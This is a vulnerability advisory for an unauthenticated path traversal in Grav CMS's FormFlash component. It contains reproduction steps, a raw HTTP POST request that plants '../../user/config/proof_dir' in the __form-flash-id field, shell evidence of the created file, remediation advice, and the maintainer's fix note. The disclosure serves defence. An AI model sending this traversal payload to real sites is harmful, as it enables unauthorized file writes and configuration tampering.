Grav has Unauthenticated Path Traversal & Arbitrary File Write in its FormFlash component

Description

Vulnerability Report: Grav CMS Unauthenticated Path Traversal & Arbitrary File Write

[ZERO-DAY] Unauthenticated Path Traversal leading to Arbitrary Directory Creation and Configuration Injection

Summary

Grav CMS (v1.7.49.5 and latest development source) is vulnerable to a Zero-Day Path Traversal vulnerability within the FormFlash core component. By manipulating the session_id (passed as __form-flash-id in POST requests), an unauthenticated attacker can traverse the filesystem to create arbitrary directories and write an index.yaml file containing attacker-controlled data.

This vulnerability can lead to unauthorized modification of application behavior, potential data integrity issues, and service disruption in production environments.

Affected Component

  • Versions: Confirmed in Grav v1.7.49.5 (latest stable) and the latest development source (March 2026).
  • Class: Grav\Framework\Form\FormFlash
  • Method: __construct() / getTmpDir()
  • Parameter: session_id (Mapped to __form-flash-id in POST requests)

Vulnerability Details

The FormFlash class is used to persist form data across redirects. It constructs a temporary storage path using the provided session_id. The path construction logic in the latest source:

$folder = $config['folder'] ?? ($this->sessionId ? 'tmp://forms/' . $this->sessionId : '');
$this->folder = $folder && $locator->isStream($folder) ? $locator->findResource($folder, true, true) : $folder;

Lack of sanitization on the sessionId (the raw session identifier) allows the use of ../ sequences. When findResource resolves the stream, it allows escape into any writable directory within the webserver's scope (typically user/config/, cache/, logs/, and tmp/).

Affected Versions & Zero-Day Status

  • Tested Version: v1.7.49.5 (Latest Stable Release as of Nov 2025).
  • Development Branch Status: Vulnerable. The latest source code in the GitHub develop branch (March 2026) remains unpatched.
  • Affected Range: All Grav CMS versions utilizing the FormFlash component (v1.7.x and potentially older v1.6.x versions).
  • CVE Status: Zero-Day (Non-Registered). Extensive research confirmed no existing CVE addresses this specific core FormFlash session-based traversal.

Steps to Reproduce

  1. Identify any page containing a Grav Form (e.g., /contact).
  2. Intercept the POST request during form submission.
  3. Modify the __form-flash-id parameter to include a traversal sequence targeting a writable directory (e.g., ../../user/config/proof_dir).
  4. Submit the request.
  5. Observe that a new directory (poc/) and file (index.yaml) have been created at the traversed path.

Request Example

POST /contact HTTP/1.1
Host: target.grav.cms
Content-Type: application/x-www-form-urlencoded

__form-name-=contact&__form-flash-id=../../user/config/proof_dir&form-data[name]=Attack&form-data[message]=Payload

Response / Result

  • HTTP/1.1 302 Found (Standard redirect)
  • Filesystem Modification:
  • Directory Created: /var/www/html/user/config/proof_dir/poc/
  • File Created: /var/www/html/user/config/proof_dir/poc/index.yaml

Proof of Concept Evidence (Before/After)

Before Exploitation

  • Status: Directory does not exist.
  • Evidence:
$ ls -la /var/www/html/user/config/proof_dir/
ls: cannot access '/var/www/html/user/config/proof_dir/': No such file or directory

After Exploitation

  • Status: Arbitrary directory and index.yaml created.
  • Evidence:
$ ls -la /var/www/html/user/config/proof_dir/poc/index.yaml
-rw-rw-r-- 1 www-data www-data 158 Mar 23 22:15 /var/www/html/user/config/proof_dir/poc/index.yaml
$ cat /var/www/html/user/config/proof_dir/poc/index.yaml
form: ''
id: ''
unique_id: poc
...
data:
  poc_status: confirmed

Impact

  • Clarified Cross-User Attack: By controlling the session identifier, an attacker can overwrite or interfere with other users temporary form data, breaking session isolation.
  • Configuration Injection: Writing index.yaml into plugin/theme configuration subdirectories can alter application behavior or inject malicious settings.
  • Data Integrity: Unauthorized modification of configuration subfolders can lead to widespread site corruption or logical bypasses.
  • Denial of Service (DoS): Recursive directory creation enables attackers to exhaust disk space or inodes (inode exhaustion).

Attack Requirements

  • Authentication: None (Unauthenticated)
  • Configuration: Standard Grav installation with at least one form-enabled page (e.g., Contact, Login, Registration)

Exploitability Assessment

  • Complexity: Low. Requires only basic HTTP POST parameters.
  • Reliability: 100% (Deterministically reproducible in vulnerable versions).
  • Severity: Critical / High. The vulnerability requires no authentication and allows filesystem manipulation and session data corruption.

Remediation

  1. Sanitize Session IDs: Apply basename() or a strict alphanumeric regex to the session_id in FormFlash before path construction.
  2. Filesystem Hardening: Ensure user/config/ and other sensitive directories have restrictive permissions preventing the webserver from creating new subdirectories.
  3. Update Grav: Monitor for patches addressing FormFlash sanitization.

Maintainer note — fix applied (2026-04-24)

Fixed in Grav core on the 2.0 branch: commit d904efc33 — will ship in 2.0.0-beta.2.

What changed: FormFlash::__construct() now sanitizes session_id, unique_id, and id through a strict [A-Za-z0-9,_-]{1,64} allowlist before any path is constructed from them. Invalid values collapse to '', which causes save()/delete()/getTmpDir() to no-op — so a __form-flash-id=../../user/config/proof_dir POST simply does nothing on disk.

Files:

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-05-05 21:34:58 UTC
Updated
2026-05-13 13:52:36 UTC
GitHub reviewed
2026-05-05 21:34:58 UTC
NVD published
2026-05-11

EPSS Score

Score Percentile
0.09% 25.64%

CVSS Scores

Base score Version Severity Vector
8.8 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:N)
No availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.
Exploit maturity (threat) (E:P)
Proof-of-concept: public PoC exists; no reported exploitation and no known simplification tools.

Identifiers

CWEs

CWE id Name
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Credits

  • sentinal404 (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer getgrav/grav < 2.0.0-beta.2 2.0.0-beta.2

References

cvelogic Threat Intelligence